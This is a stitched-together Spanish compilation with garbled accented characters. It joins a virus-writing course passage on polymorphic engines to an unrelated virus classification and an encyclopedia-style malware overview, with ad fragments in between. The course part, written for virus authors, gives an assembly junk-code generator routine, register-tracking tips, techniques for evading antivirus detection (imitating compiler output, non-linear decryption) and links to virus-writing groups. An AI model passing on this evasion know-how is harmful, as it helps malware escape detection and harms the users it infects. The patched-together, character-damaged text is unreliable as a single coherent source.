aleatoriamente a distintas funciones para generar cdigo basura. Una de ellas podra ser esta: ; suponemos que ; EDI = lugar donde generar Genera_Reg_Imm: mov al, 0B8h call Genera_Aleatorio ; valor devuelto en ECX and cl, 07h ; hace que el valor vaya de 0 a 7 add al, cl stosb call Genera_Aleatorio stosd ret Ahora, qu hace este cdigo?. 0B8h es el cdigo de operacin de MOV EAX, valor_inmediato, y le estamos aadiendo un valor aleatorio entre cero y siete (nuestro
generador aleatorio fabrica nmeros de 32 bits). La razn la entendemos si miramos la siguiente tabla: Efectivamente, cuando el procesador ve un byte con uno de estos valores, lo interpreta como "mover a tal registro tal valor". Por tanto, leer los cuatro siguientes bytes para averiguar cul es ese valor. Internamente mover ese valor al registro y continuar su ejecucin. || Cdigo || Accin || || || 0B8h || MOV EAX, valor || || || 0B9h || MOV ECX, valor || || || 0BAh || MOV EDX, valor || || || 0BBh || MOV EBX, valor || || || || || 98 || || 0BCh || MOV ESP, valor || || 0BDh || MOV EBP, valor || || 0BEh || MOV ESI, valor || || 0BFh || MOV EDI, valor || Nosotros hemos averiguado que estos opcodes, los que van del rango 0B8h a 0BFh, sirven para mover un valor a un registro; por tanto en la rutina que habamos fabricado y que se llamaba de forma aleatoria por un CALL, vamos a generar una rden tipo //MOV ,// aleatoria. Aun as, un cdigo como el mostrado anteriormente no puede quedarse as. Hay registros que nosotros estamos utilizando y que no queremos que sean modificados. Adems, tampoco nos conviene modificar el registro de pila, ESP, puesto que entonces si estaramos interfiriendo con la ejecucin del programa - y de nuestro propio virus. Tendremos por tanto que hacer una comprobacin de si el valor generado es 0BCh (mov ESP, ) y volver al principio de la rutina si es as. Adems, tenemos que comprobar el tema de los registros que nosotros estamos utilizando, porque si escribiramos sobre ellos la desencriptacin no funcionara y el programa con toda probabilidad se colgara al ejecutarse. Una forma - y pueden servir muchas, esto siempre es a discreccin del programador - de controlar aquello sobre lo que escribimos, sera sencillamente mantener un byte de datos en el que cada bit hiciera referencia a un registro (mejor en el mismo rden de la tabla anterior dado que es estndar y podremos aplicarlo en muchos lugares). Por ejemplo, si el valor de ese byte de datos fuera 01011010 y hubiramos decidido que un 1 significa "ocupado", entonces estaran "ocupados" los registros ECX, EBX, ESP y ESI... al realizar nuestras rutinas que manejaran registros comprobaramos este byte de datos para ver si estn a 1, en cuyo caso buscaramos otro registro sobre el que operar (un buen mtodo para consultar este byte, seran las instrucciones que operan a nivel de bit, como BTS, BTEST, etc) El nmero de instrucciones que podemos generar como cdigo basura es casi interminable, aunque tambin hemos de tener cuidado dado que los antivirus suelen cazar estos engines entre otras cosas dado que en el afn por generar cdigo aleatorio se ponen instrucciones "raras", que normalmente no son generadas por un compilador. En cualquier caso, algunos ejemplos de lo que podemos hacer:
-Movimientos (MOV) de valores inmediatos a registros no utilizados, o de registro a registro (tan slo es importante si el registro destino est ocupado). -Operaciones aritmticas o lgicas sobre aquellos registros que no utilicemos, tanto con otros registros como con valores inmediatos (ADD, SUB, OR, XOR...). -Comprobaciones (como CMP o TEST), que en caso de poder ser evaluadas a priori podran dar lugar a saltos condicionales (JZ, JNZ, etc etc). -Llamadas a subrutinas (CALL/RET), manejando internamente los puntos de retorno para que el cdigo sea coherente y no de problemas.. -Saltos condicionales y no condicionales (manteniendo un clculo de hacia dnde se dirigen, como es lgico). -Otras muchas ms instrucciones, como operaciones de cadena tipo LODSB, instrucciones monolticas como CDQ, STI, CLD, LAHF, etc, de bit como BTEST y dems... -Lecturas y escrituras de memoria en modelos ms complejos en que controlemos estas lecturas y escrituras para no generar fallos de pgina (por ejemplo, creando un marco de pila en el cdigo y escribiendo all). Quiz el mejor arma que podemos tener cuando nos embarcamos en la compleja tarea de escribir un engine polimrfico, sea una buena tabla de instrucciones relacionadas con opcodes; personalmente uso los propios manuales de Intel, donde en tres o cuatro tablas se indica la forma de codificar toda referencia a registro e inmediato y sus combinaciones... siempre se puede descargar una copia en PDF en la pgina de Intel actualizado al procesador ms actual - tened en cuenta que hay instrucciones que no servirn para ordenadores antiguos, y siempre es bueno mantener cierta compatibilidad hacia atrs -. Combinando estas tablas (las que hacen referencia a las formas de direccionamiento ModR/M y SIB) con la referencia que en cada instruccin da Intel a nivel de opcode y nuestra propia experiencia, podemos llevar adelante la programacin de un generador de instrucciones aleatorias. Puede ser infalible el polimorfismo? La respuesta, lamentablemente es sencilla. No, no ha existido un engine polimrfico que haga indetectable a un virus, ni lo habr siguiendo por el camino clsico, por el camino que he mostrado en los dos anteriores apartados. Los antivirus utilizan diversas tcnicas, como emular el cdigo para desencriptar el virus; s, podemos poner trampas anti-debugging en l, pero no es una buena garanta para ese mtodo en particular. Y en cualquier caso, el verdadero problema no est ah. Sera largo de explicar y tendra que tocar teora de lenguajes y autmatas, pero sera sencillo demostrar que un engine polimrfico no puede llegar a ser indetectable. La generacin de cdigo aleatorio y las instrucciones de desencriptado equivalen a un alfabeto
que utilizamos para hacer "palabras", palabras que son el cdigo que hemos fabricado de forma semi-aleatoria. Lamentablemente, ese cdigo generado ha sido realizado respecto a unas reglas de produccin - no importa que las llamadas a funciones generadoras se intercalen de forma aleatoria -, y ese hecho lleva a una conclusin propia ala teora de lenguajes y autmatas; que todo lo que generemos es detectable, o, en trminos de esta teora, que toda produccin tiene un autmata correspondiente que lo detecta sin errores. Es algo que sin duda no puedo explicar en un slo prrafo; quien est ms interesado que mire cierto artculo que escrib hace un par de aos llamado "Polimorphism and Grammars" bajo el seudnimo de Qozah demostrando el hecho de que, lamentablemente, un engine polimrfico no puede hacerse indetectable. Podemos sin embargo adoptar otras estrategias; apunt una en aquel entonces que puede hacer a un virus inlimpiable si es trabajada con suficiente intensidad (tcnica que utiliz de forma primitiva en mi virus Unreal)... no obstante no ofreca soluciones al problema de la indetectabilidad. Lamentablemente, a estas alturas seguimos sin tener ninguna. Otras formas de aproximarse al polimorfismo El paradigma clsico del polimorfismo es el que he intentado mostrar en los apartados anteriores; un "centro coordinador" que llame aleatoriamente a rutinas que generan instrucciones basura, mezclado con cdigo que genera instrucciones vlidas dedicadas a desencriptar el virus y las cuela entre medias del cdigo basura. Sabemos ya que este sistema no puede hacer indetectable un virus, aunque sin duda puede hacer mucho ms difcil su deteccin si se lleva a cabo de forma correcta. Qu alternativas nos quedan por probar? He aqu algunas ideas: - Paralelizacin masiva dbilmente coordinada: El nuevo paradigma de la IA, la "embodied cognitive science", puede ponernos en la pista sobre la realizacin de engines polimrficos ms efectivos. Esta, se basa en la acumulacin de multitud de procesos sencillos que dan lugar a una conducta que puede ser calificada como inteligente; pero esta conducta no est preparada y es difcil de predecir pues se basa en la interaccin del agente con su entorno y la interaccin de todos sus procesos. Un camino pues interesante en la programacin de engines polimrficos consiste en basar el cdigo en una paralelizacin masiva de rutinas que no slo generen cdigo sino que lo modifiquen de diversas maneras. La interaccin de estos procesos podra dar lugar a resultados no previsibles de tal modo que no fueran detectables... no obstante, hay que tener en cuenta que no podemos dejar a su libre albedro a estos procesos (el cdigo final tiene que ser ejecutable sin problemas para el fichero infectado y para el virus), y que al fin y al cabo cuando ejecutamos este tipo de modificaciones seguimos ejecutando cdigo de forma secuencial por mucho paralelismo que haya. Por un lado deberamos anular coherentemente las restricciones clsicas de la programacin concurrente sobre secciones crticas; normalmente cuando dos procesos en paralelo acceden a la misma porcin de datos nunca se deja que accedan a la vez pues podran crear un estado incongruente en los datos. Por ejemplo, si concurrentemente se ejecutan z = z+1 y z
= z+2, hacemos que solo uno de los dos pueda acceder a "z" en el mismo momento, pues sino en lugar de ser el resultado final un "z = z + 3", podra ser "z = z+1" o "z = z+2" (si el proceso A carga z en un registro en su espacio de ejecucin, despus lo hace B, modifican el valor de z en estos registros y vuelven a ponerlos en memoria, las sumas no se han aadido entre s sino que slo uno de los resultados se colocar en memoria). La cuestin, es que si utilizamos estas mismas restricciones que sirven normalmente en la programacin concurrente para no generar incongruencias, resulta prcticamente como si estuvieramos ejecutando cdigo secuencial y predecible... tendramos que programar de modo que los resultados no fueran adivinables y por tanto detectables, pero estando a la vez pendientes de que los resultados que se generen an siendo imprevistos sigan siendo congruentes y ejecutables, sin crear ningn problema para el virus ni para el ejecutable infectado. Una tarea nada sencilla... - Generacin de cdigo que intente imitar cdigo legtimo: Esto es una variante bastante interesante dentro del objetivo de la mayora de los engines polimrficos, y que ya est siendo adoptada por algunos programadores de virus. Utilizando el mtodo clsico quiz el resultado sea una serie de instrucciones que, si bien son bastante aleatorias, no son realmente coherentes como cdigo. Con esta aproximacin, se pretende que el cdigo resultante sea realmente parecido a un programa legtimo. Aqu entra en buen grado la investigacin individual; podramos por ejemplo generar inicios de subrutina con un aspecto tipo MOV EBP,ESP/SUB ESP, XX, que suele ser el comienzo de toda subrutina e incluso de buena parte de los programas que veamos; se trata de una estructura que se llama marco de pila y que consiste en que al llamarse a una subrutina se deja en la pila un espacio (al inicio del cual apunta EBP) para almacenar las variables locales que se utilizarn en ese procedimiento (de modo que no se gasta espacio en memoria intilmente). As, si por ejemplo en el cdigo C con que fue escrito un programa tenemos tan slo una variable tipo "long int variable", normalmente el compilador al principio de ese procedimiento restar 4 a la pila (4 bytes es el tamao de un long int), y con EBP har referencia a esta variable (y a otras en caso de haber ms). La imitacin de este tipo de estructuras comunes generadas por compiladores de lenguajes de alto nivel, puede dar un carcter muy interesante a un engine polimrfico que ya no simplemente pretenda "ser muy aleatorio", sino parecerse lo ms posible a cdigo legtimo hasta un punto ptimo en que sera indetectable al no poder distinguirse de cdigo real. El problema de esta tcnica suponiendo el caso ideal en que hubieramos controlado una coherencia de modo que el cdigo pareciera realista, es el hecho de que aun as tenemos que insertar en este cdigo basura las instrucciones que desencriptan el virus; as pues, aunque hubiramos conseguido hacernos indistinguibles del cdigo legtimo de cualquier otro programa, seguiramos teniendo el problema de que unas pocas instrucciones en ese cdigo, las que desencriptan nuestro virus, no son variables del mismo modo y por tanto puede fabricarse un programa - autmata si volvemos a la teora de lenguajes - que detecte el autorreplicante. Se trata, en cualquier caso, de un camino interesante a explorar y que se lo pone mucho ms
difcil a quien intente detectar nuestro virus; tendremos que centrar entonces mucho esfuerzo en hacer que las instrucciones crticas, las que desencriptan nuestro virus, se oculten de la mejor forma posible (por ejemplo, Mental Driller sostiene con mucha lgica que se debe evitar desencriptar linealmente el virus para evitar levantar sospechas, es decir, no basarlo en un //xor [esi]/inc// esi sino en una forma ms compleja de ir recorriendo todo el virus. Conclusiones La programacin de un engine polimrfico no es precisamente una labor sencilla. Requiere mucho esfuerzo, mucha imaginacin y planificacin para que nada falle; si cometemos errores su consecuencia ser probablemente el que nuestro virus deje de funcionar en aquellos ficheros infectados a los que nuestro error en la generacin de cdigo afect. Sin embargo, no he dado cdigo ms que para ilustrar pequeas cosas; pero lo hago porque creo que la programacin de un engine polimrfico, a la par que una de las cosas ms difciles de hacer cuando se lleva a cabo en serio, es de las ms personales y gratificantes con las que podemos atrevernos escribiendo un autorreplicante. He pretendido hacer que se entienda como funcionan; con esto en la cabeza, la mejor opcin es programar uno desde cero con ideas propias. Es posible que se descubra o se utilice algo que a nadie se le haba ocurrido an. No obstante, como he insistido en el punto anterior, no debemos ser demasiado optimistas respecto a las posibilidades de esta tcnica; de momento, nadie ha descubierto como fabricar el virus indetectable.
18 - Apndices
Curso gratis creado por Wintermute . 22 Febrero 2006 Movistar Per Movistar 4 Mbps + Tv HD a s/. 69. Adems Antivirus y Aula 365 GRATIS www.movistar.com.pe Anuncios Google
< anterior | 1 .. 14 15 16 17 18
Documentacin en la Red Programacin de virus para Windows http://www.oninet.es/usuarios/darknode www.oninet.es/usuarios/darknode -> Con esta URL casi basta. En la seccin "Other utilities" hay una buena referencia a todo tipo de utilidades como TASM, IDA, SoftIce, HIEW, etctera, y documentacin como el fichero Win32.HLP del SDK de Microsoft con referencia de la API, la lista de interrupciones de Ralf Brown, en fin, TODO lo que puedas necesitar. pluto.spaceports.com/~asm32 -> Pgina de Iczelion, tutoriales muy interesantes para programacin en ensamblador bajo entornos Windows, cubriendo desde un tutorial de ASM orientado a Windows a listas de constantes, programacin de VxDs, programacin de sockets, etctera. Programacin de virus para Linux linuxassembly.org -> Pgina dedicada a la programacin en lenguaje ASM en Linux. nasm.2y.net -> Compilador NASM (Netwide Assembler, formato Intel) ftp://sources.redhat.com/pub/binutils/snapshots -> Compilador GAS (GNU Assembler), con formato AT&T, incorporado en las "binutils". http://www.gnu.org/software/gdb/gdb.html www.gnu.org/software/gdb/gdb.html -> El conocido (y potente) debugger GDB (formato AT&T) ellipse.mcs.drexel.edu/ald.html -> ALD (debugger para Linux parecido al Debug clsico, con formato Intel) biew.sourceforge.net -> BIEW (visor hexadecimal para Linux) Lugares de inters para la programacin de virus cedar.intel.com/cgi-bin/ids.dll/main.jsp -> Pgina de Intel orientada a desarrolladores, con informacin muy interesante sobre codificacin de instrucciones, etc etc. www.oninet.es/usuarios/darknode -> Ensambladores, debuggers, visores hexadecimales y links, links y links a todo lo habido y por haber.
http://www.coderz.net/29a www.coderz.net/29a -> Pgina oficial del grupo 29A, programacin de virus informticos. http://www.coderz.net/ikx/members.html www.coderz.net/ikx/members.html -> Grupo de programacin de virus IKX http://www.coderz.net/mtxvx/ www.coderz.net/mtxvx/ -> Grupo de programacin de virus "Matrix" Libros interesantes Windows 95 System Programming Secrets Escrito por Matt Pietrek (ojo, aseguraos si lo consegus del autor, que luego han surgido a su sombra libros como Windows 2000 Programming Secrets y Windows 98 Programming Secrets que no tienen nada a nivel kernel y son las tpicas guas de C++ y ActiveX), Windows 95 System Programming Secrets es quiz la mayor joya que se ha escrito en general para Win32, este libro lamentablemente ya no se edita aunque pueden encontrarse algunas de sus partes desperdigadas por
Curso gratis creado por Jorge E. Pereira . Extraido de: http://www.publispain.com/supertutoriales 27 Marzo 2009 Movistar Per Movistar 4 Mbps + Tv HD a s/. 69. Adems Antivirus y Aula 365 GRATIS www.movistar.com.pe Anuncios Google
< anterior | 1 2 3 4 5 | siguiente >
Los virus pueden ser clasificados por su comportamiento, origen, o tipo de archivo que atacan. La primera clasificacin que se hizo de los programas del tipo virus, fue dividirlos entre los llamados "Caballos de Troya" y "Bombas de Tiempo". Los primeros, llamados as porque se introducen al sistema bajo una apariencia diferente a la de su objetivo final, quedando sin actividad por un tiempo.Las "Bombas de Tiempo", por su parte, se esconden en la memoria del sistema o en un medio magntico de almacenamiento (disquete o disco duro) y se activan en una fecha determinada, haciendo "explosin". La clasificacin mas aceptada, en la actualidad es la que hace John MacAfee y Asociados, la cual divide los virus de acuerdo al lugar donde atacan, al dao que hacen. Lugar donde se ubican o atacan: Tabla de Particin del Disco Fijos Sector de Carga Inicial de los Discos Fijos Sector de Carga Inicial de Discos Flexibles Programas Overlay Programas Ejecutables con extensin .EXE o .COM Programa COMMAND.COM del Sistema Operativo Los que se instalan a s mismo en Memoria Los que se Auto-Encriptan y
Los que usan tcnicas de Bloqueo. Por el tipo de Dao que producen: Sobre-escribe o borra archivos o programas Corrompe o borra sector de carga inicial o BOOTeo Corrompe datos en archivos Formatea o borra todo/parte del disco Directa o indirectamente corrompe relacin de los archivos Afecta sistema tiempo-operacin Corrompe programas o archivos relacionados
Naturalmente hay virus que no solo caen en una, sino en varias clasificaciones. Entendiendo que existe mas de 1,400 virus identificados, y cada da aparecen nuevos virus, les ayudar a comprender la magnitud y complejidad de los problemas que se tendr en el futuro con los virus. Un mismo virus puede ejecutar diferentes daos a diferentes partes de las unidades de almacenamiento, o archivos. Pero, eso no es todo, son muchos los "hackers", o apasionados de la computacin que sentados horas y horas frente a sus equipos, estn buscando la forma de producir el sper virus, capaz de no ser detectado, reproducirse sin ser notado, y causar toda clase de dolores de cabeza a los usuarios de computadora.
Malware
Saltar a: navegacin, bsqueda
Malware (del ingls malicious software), tambin llamado badware, cdigo maligno, software malicioso o software malintencionado, es un tipo de software que tiene como objetivo infiltrarse o daar una computadora o Sistema de informacin sin el consentimiento de su propietario. El trmino malware es muy utilizado por profesionales de la informtica para referirse a una variedad de software hostil, intrusivo o molesto.1 El trmino virus informtico suele aplicarse de forma incorrecta para referirse a todos los tipos de malware, incluidos los virus verdaderos. El software se considera malware en funcin de los efectos que, pensados por el creador, provoque en un computador. El trmino malware incluye virus, gusanos, troyanos, la mayor parte de los rootkits, scareware, spyware, adware intrusivo, crimeware y otros softwares maliciosos e indeseables.2 Malware no es lo mismo que software defectuoso; este ltimo contiene bugs peligrosos, pero no de forma intencionada. Los resultados provisionales de Symantec publicados en el 2008 sugieren que el ritmo al que se ponen en circulacin cdigos maliciosos y otros programas no deseados podra haber superado al de las aplicaciones legtimas.3 Segn un reporte de F-Secure, Se produjo tanto malware en 2007 como en los 20 aos anteriores juntos.4 Segn Panda Security, durante los 12 meses del 2011 se han creado 73.000 nuevos ejemplares de amenazas informticas por da, 10.000 ms de la media registrada en todo el ao 2010. De stas, el 73 por ciento son troyanos y crecen de forma exponencial los del subtipo downloaders.5 6
ndice
1 Propsito 2 Malware infeccioso: virus y gusanos 3 Malware oculto: Backdoor o Puerta trasera, Drive-by Downloads, Rootkits y Troyanos o 3.1 Puertas traseras o Backdoors o 3.2 Drive-by Downloads o 3.3 Rootkits o 3.4 Troyanos 4 Malware para obtener beneficios o 4.1 Mostrar publicidad: Spyware, Adware y Hijacking o 4.2 Robar informacin personal: Keyloggers y Stealers o 4.3 Realizar llamadas telefnicas: Dialers o 4.4 Ataques distribuidos: Botnets o 4.5 Otros tipos: Rogue software y Ransomware 4.5.1 Los Ransomware 5 Grayware o greynet 6 Vulnerabilidades usadas por el malware o 6.1 Eliminando cdigo sobre-privilegiado 7 Programas anti-malware 8 Mtodos de proteccin 9 Vase tambin o 9.1 Compaas Antimalware 10 Referencias
Propsito
Algunos de los primeros programas infecciosos, incluido el primer gusano de Internet y algunos virus de MS-DOS, fueron elaborados como experimentos, como bromas o simplemente como algo molesto, no para causar graves daos en las computadoras. En
algunos casos el programador no se daba cuenta de cunto dao poda hacer su creacin. Algunos jvenes que estaban aprendiendo sobre los virus los crearon con el nico propsito de demostrar que podan hacerlo o simplemente para ver con qu velocidad se propagaban. Incluso en 1999 un virus tan extendido como Melissa pareca haber sido elaborado tan slo como una travesura. El software diseado para causar daos o prdida de datos suele estar relacionado con actos de vandalismo. Muchos virus son diseados para destruir archivos en discos duros o para corromper el sistema de archivos escribiendo datos invlidos. Algunos gusanos son diseados para vandalizar pginas web dejando escrito el alias del autor o del grupo por todos los sitios por donde pasan. Estos gusanos pueden parecer el equivalente informtico del graffiti. Sin embargo, debido al aumento de usuarios de Internet, el software malicioso ha llegado a ser diseado para sacar beneficio de l, ya sea legal o ilegalmente. Desde 2003, la mayor parte de los virus y gusanos han sido diseados para tomar control de computadoras para su explotacin en el mercado negro. Estas computadoras infectadas ("computadoras zombie") son usadas para el envo masivo de spam por e_mail, para alojar datos ilegales como pornografa infantil,7 o para unirse en ataques DDoS como forma de extorsin entre otras cosas. Hay muchos ms tipos de malware producido con nimo de lucro, por ejemplo el spyware, el adware intrusivo y los hijacker tratan de mostrar publicidad no deseada o redireccionar visitas hacia publicidad para beneficio del creador. Estos tipos de malware no se propagan como los virus, generalmente son instalados aprovechndose de vulnerabilidades o junto con software legtimo como aplicaciones P2P.
Virus de ping-pong.
Artculo principal: Virus. Artculo principal: Gusano.
Los tipos ms conocidos de malware, virus y gusanos, se distinguen por la manera en que se propagan, ms que por otro comportamiento particular.8 El trmino virus informtico se usa para designar un programa que, al ejecutarse, se propaga infectando otros softwares ejecutables dentro de la misma computadora. Los virus tambin pueden tener un payload9 que realice otras acciones a menudo maliciosas, por ejemplo, borrar archivos. Por otra parte, un gusano es un programa que se transmite a s mismo, explotando vulnerabilidades en una red de computadoras para infectar otros equipos. El principal objetivo es infectar a la mayor cantidad posible de usuarios, y tambin puede contener instrucciones dainas al igual que los virus. Ntese que un virus necesita de la intervencin del usuario para propagarse mientras que un gusano se propaga automticamente. Teniendo en cuenta esta distincin, las infecciones transmitidas por e-mail o documentos de Microsoft Word, que dependen de su apertura por parte del destinatario para infectar su sistema, deberan ser clasificadas ms como virus que como gusanos.
Un backdoor o puerta trasera es un mtodo para eludir los procedimientos habituales de autenticacin al conectarse a una computadora. Una vez que el sistema ha sido comprometido (por uno de los anteriores mtodos o de alguna otra forma), puede instalarse una puerta trasera para permitir un acceso remoto ms fcil en el futuro. Las puertas traseras tambin pueden instalarse previamente al software malicioso para permitir la entrada de los atacantes. Los crackers suelen usar puertas traseras para asegurar el acceso remoto a una computadora, intentando permanecer ocultos ante una posible inspeccin. Para instalar puertas traseras los crackers pueden usar troyanos, gusanos u otros mtodos. Se ha afirmado, cada vez con mayor frecuencia, que los fabricantes de ordenadores preinstalan puertas traseras en sus sistemas para facilitar soporte tcnico a los clientes, pero no ha podido comprobarse con seguridad.10
Drive-by Downloads
Google ha descubierto que una de cada 10 pginas web que han sido analizadas a profundidad pueden contener los llamados drive by downloads, que son sitios que instalan spyware o cdigos que dan informacin de los equipos sin que el usuario se percate. 11 A estas acciones Niels Provos y otros colaboradores de Google Inc le denominaron, en un artculo, "El fantasma en la computadora". 12 Por ello, se estn realizando esfuerzos para identificar las pginas que pudieran ser maliciosas. El trmino puede referirse a las descargas de algn tipo de malware que se efecta sin consentimiento del usuario, lo cual ocurre al visitar un sitio web, al revisar un mensaje de correo electrnico o al entrar a una ventana pop-up, la cual puede mostrar un mensaje de error. Sin ser su verdadera intencin, el usuario consiente la descarga de software indeseable o de malware, y estas vulnerabilidades se aprovechan. El proceso de ataque Drive-by Downloads se realiza de manera automtica mediante herramientas que buscan en el sitio web alguna vulnerabilidad. Una vez encontrada, insertan un script malicioso dentro del cdigo HTML del sitio violado. Cuando un usuario visita el sitio infectado, ste descargar dicho script en el sistema del usuario, y a continuacin realizar una peticin a un servidor (Hop Point), donde se solicitarn nuevos scripts con exploits encargados de comprobar si el equipo tiene alguna vulnerabilidad que pueda ser explotada, intentando con ellas hasta que tienen xito, en cuyo caso se descargar un script que descarga el archivo ejecutable (malware) desde el servidor. En la mayor parte de los navegadores se estn agregando bloqueadores antiphishing y antimalware que contienen alertas que se muestran cuando se accede a una pgina web daada, aunque no siempre dan una total proteccin.
Rootkits Artculo principal: Rootkit.
Las tcnicas conocidas como rootkits modifican el sistema operativo de una computadora para permitir que el malware permanezca oculto al usuario. Por ejemplo, los rootkits evitan que un proceso malicioso sea visible en la lista de procesos del sistema o que sus ficheros sean visibles en el explorador de archivos. Este tipo de modificaciones consiguen ocultar cualquier indicio de que el ordenador esta infectado por un malware. Originalmente, un rootkit era un conjunto de herramientas instaladas por un atacante en un sistema Unix donde el atacante haba obtenido acceso de administrador (acceso root). Actualmente, el trmino es usado mas generalmente para referirse a la ocultacin de rutinas en un programa malicioso. Algunos programas maliciosos tambin contienen rutinas para evitar ser borrados, no slo para ocultarse. Un ejemplo de este comportamiento puede ser:
"Existen dos procesos-fantasmas corriendo al mismo tiempo. Cada proceso-fantasma debe detectar que el otro ha sido terminado y debe iniciar una nueva instancia de este en cuestin de milisegundos. La nica manera de eliminar ambos procesos-fantasma es eliminarlos simultneamente, cosa muy difcil de realizar, o provocar un error el sistema deliberadamente."13
Uno de los rootkits ms famosos fue el que la empresa Sony BMG Music Entertainment, secretamente incluyo, dentro de la proteccin anticopia de algunos CD de msica, el software Extended Copy Protection (XCP) y MediaMax CD-3, 14 los cuales modificaban a Windows para que no lo pudiera detectar y tambin resultar indetectable por los programas anti-virus y anti-spyware, actuaba enviando informacin sobre el cliente, adems abri la puerta a otros tipos de malware que pudieron infiltrarse en las computadoras, ademas de que s se detectaba no poda ser eliminado pues se daaba el sistema operativo. Mikko Hypponen, jefe de investigacin de la empresa de seguridad, F-Secure con sede en Finlandia, considero a este rootkit como uno de los momentos fundamentales de la historia de los malware.15
Troyanos
El trmino troyano suele ser usado para designar a un malware que permite la administracin remota de una computadora, de forma oculta y sin el consentimiento de su propietario, por parte de un usuario no autorizado. Este tipo de malware es un hbrido entre un troyano y una puerta trasera, no un troyano atendiendo a la definicin. A grandes rasgos, los troyanos son programas maliciosos que estn disfrazados como algo inocuo o atractivo que invitan al usuario a ejecutarlo ocultando un software malicioso. Ese software, puede tener un efecto inmediato y puede llevar muchas consecuencias indeseables, por ejemplo, borrar los archivos del usuario o instalar ms programas indeseables o maliciosos.
Los tipos de troyanos son: backdoors, banker, botnets, dialer, dropper, downloaders, keylogger, password stealer, proxy. 16 17 Los troyanos conocidos como droppers18 19 son usados para empezar la propagacin de un gusano inyectndolo dentro de la red local de un usuario. Una de las formas ms comunes para distribuir spyware es mediante troyanos unidos a software deseable descargado de Internet. Cuando el usuario instala el software esperado, el spyware es puesto tambin. Los autores de spyware que intentan actuar de manera legal pueden incluir unos trminos de uso, en los que se explica de manera imprecisa el comportamiento del spyware, que los usuarios aceptan sin leer o sin entender.
Los programas spyware son creados para recopilar informacin sobre las actividades realizadas por un usuario y distribuirla a agencias de publicidad u otras organizaciones interesadas. Algunos de los datos que recogen son las pginas web que visita el usuario y direcciones de e mail, a las que despus se enva spam. La mayora de los programas spyware son instalados como troyanos junto a software deseable bajado de Internet. Otros programas spyware recogen la informacin mediante cookies de terceros o barras de herramientas instaladas en navegadores web. Los autores de spyware que intentan actuar de manera legal se presentan abiertamente como empresas de publicidad e incluyen unos trminos de uso, en los que se explica de manera imprecisa el comportamiento del spyware, que los usuarios aceptan sin leer o sin entender. Por otra parte los programas adware muestran publicidad al usuario de forma intrusiva en forma de ventanas emergentes (pop-up) o de cualquier otra forma. Esta publicidad aparece inesperadamente en el equipo y resulta muy molesta. Algunos programas shareware permiten usar el programa de forma gratuita a cambio de mostrar publicidad, en este caso el usuario consiente la publicidad al instalar el programa. Este tipo de adware no debera ser considerado malware, pero muchas veces los trminos de uso no son completamente transparentes y ocultan lo que el programa realmente hace.
Los hijackers son programas que realizan cambios en la configuracin del navegador web. Por ejemplo, algunos cambian la pgina de inicio del navegador por pginas web de publicidad o pornogrficas, otros redireccionan los resultados de los buscadores hacia anuncios de pago o pginas de phishing bancario. El pharming es una tcnica que suplanta al DNS, modificando el archivo hosts, para redirigir el dominio de una o varias pginas web a otra pgina web, muchas veces una web falsa que imita a la verdadera. Esta es una de las tcnicas usadas por los hijackers o secuestradores del navegador de Internet. Esta tcnica tambin puede ser usada con el objetivo de obtener credenciales y datos personales mediante el secuestro de una sesin.
Robar informacin personal: Keyloggers y Stealers
Cuando un software produce prdidas econmicas para el usuario de un equipo, tambin se clasifica como crimeware20 o software criminal, trmino dado por Peter Cassidy para diferenciarlo de los otros tipos de software malicioso. Estos programas estn encaminados al aspecto financiero, la suplantacin de personalidad y el espionaje. Los keyloggers y los stealers son programas maliciosos creados para robar informacin sensible. El creador puede obtener beneficios econmicos o de otro tipo a travs de su uso o distribucin en comunidades underground. La principal diferencia entre ellos es la forma en la que recogen la informacin. Los keyloggers monitorizan todas las pulsaciones del teclado y las almacenan para un posterior envo al creador. Por ejemplo al introducir un nmero de tarjeta de crdito el keylogger guarda el nmero, posteriormente lo enva al autor del programa y este puede hacer pagos fraudulentos con esa tarjeta. Si las contraseas se encuentran recordadas en el equipo, de forma que el usuario no tiene que escribirlas, el keylogger no las recoge, eso lo hacen los stealers. La mayora los keyloggers son usados para recopilar contraseas de acceso pero tambin pueden ser usados para espiar conversaciones de chat u otros fines.
Los stealers tambin roban informacin privada pero solo la que se encuentra guardada en el equipo. Al ejecutarse comprueban los programas instalados en el equipo y si tienen contraseas recordadas, por ejemplo en los navegadores web o en clientes de mensajera instantnea, descifran esa informacin y la envan al creador.
Realizar llamadas telefnicas: Dialers Artculo principal: Dialer.
Los dialers son programas maliciosos que toman el control del mdem dial-up, realizan una llamada a un nmero de telfono de tarificacin especial, muchas veces internacional, y dejan la lnea abierta cargando el coste de dicha llamada al usuario infectado. La forma ms habitual de infeccin suele ser en pginas web que ofrecen contenidos gratuitos pero que solo permiten el acceso mediante conexin telefnica. Suelen utilizar como seuelos videojuegos, salva pantallas, pornografa u otro tipo de material. Actualmente la mayora de las conexiones a Internet son mediante ADSL y no mediante mdem, lo cual hace que los dialers ya no sean tan populares como en el pasado.
Ataques distribuidos: Botnets
Ciclo de spam (1): Sitio web de Spammers (2): Spammer (3): Spamware (4): equipos infectados (5): Virus o troyanos (6): Servidores de correo (7): Usuarios (8): Trfico Web.
Artculo principal: Botnet.
Las botnets son redes de computadoras infectadas, tambin llamadas "zombies", que pueden ser controladas a la vez por un individuo y realizan distintas tareas. Este tipo de redes son usadas para el envo masivo de spam o para lanzar ataques DDoS contra organizaciones como forma de extorsin o para impedir su correcto funcionamiento. La ventaja que ofrece a los spammers el uso de ordenadores infectados es el anonimato, que les protege de la persecucin policial. En una botnet cada computadora infectada por el malware se loguea en un canal de IRC u otro sistema de chat desde donde el atacante puede dar instrucciones a todos los sistemas infectados simultneamente. Las botnets tambin pueden ser usadas para actualizar el malware en los sistemas infectados mantenindolos as resistentes ante antivirus u otras medidas de seguridad.
Otros tipos: Rogue software y Ransomware Artculo principal: Rogue software.
